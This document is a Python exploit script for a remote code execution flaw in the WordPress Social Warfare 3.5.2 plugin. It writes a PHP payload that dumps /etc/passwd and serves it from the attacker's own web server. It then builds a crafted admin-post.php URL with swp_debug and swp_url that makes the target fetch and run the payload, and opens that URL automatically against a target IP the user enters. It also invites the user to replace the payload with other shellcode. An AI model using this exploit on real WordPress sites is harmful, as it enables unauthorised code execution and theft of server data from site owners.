WordPress Social Warfare 3.5.2 Remote Code Execution Exploit

# Author = Raed Ahsan
# Vulnerability : SocialWarfare 3.5.2 plugin wordpress Remote Code Execution
# Linkedin = https://linkedin.com/in/raed-ahsan/


import socket
import requests
import subprocess
import time
import pyautogui

print("[*]Start your python SimpleHTTPServer on port 1234 please...")
time.sleep(5)
# Creating the payload for wordpress url
with open("shell.txt", "w") as file:
  file.write("<pre>system('cat /etc/passwd')</pre>")

print("[*]Payload has been created")

with open("url.txt", "w") as url:
  url.write("http://{MACHINE_IP}/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://{YOUR_IP}:{YOUR_PYTHON_SERVER_PORT}/shell.txt")
print("[*]Use the URL in the url.txt")
print("[*]Make sure to edit the ip and port in the url.txt according to your needs")
"""
EDIT THE IP AND PORT IN THE URL.TXT FILE ACCORDING TO YOUR NEEDS
"""
print("[*]Moving the shell.txt to /var/www/html")
time.sleep(3)
username = input("What's your username in your machine: ")
subprocess.call([f'sudo cp /home/{username}/Desktop/shell.txt /var/www/html'], shell=True)
print("[*]File copied to /var/www/html")
time.sleep(2)
print("[*]Opening Apache2 service...")
print("[*]Make sure you have apache2 installed")
subprocess.call(["sudo service apache2 start"], shell=True)
print("[*]Service started")

machine_ip = input("Target Machine IP: ")

print("[*]Open your python listener at port 1234")

time.sleep(2)
print("[*]Opening Browser")

pyautogui.hotkey('winleft')
pyautogui.typewrite('chrome\n', 0.5)
pyautogui.typewrite(f'http://{machine_ip}/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.49.200:1234/shell.txt\n', 0.2)

print("[*]If you're on tun0, make sure to change the ip in the auto execution of url section.")

print("If you want to edit the shellcode instead of /etc/passwd, do edit the shell.txt from /var/www/html and refresh the page")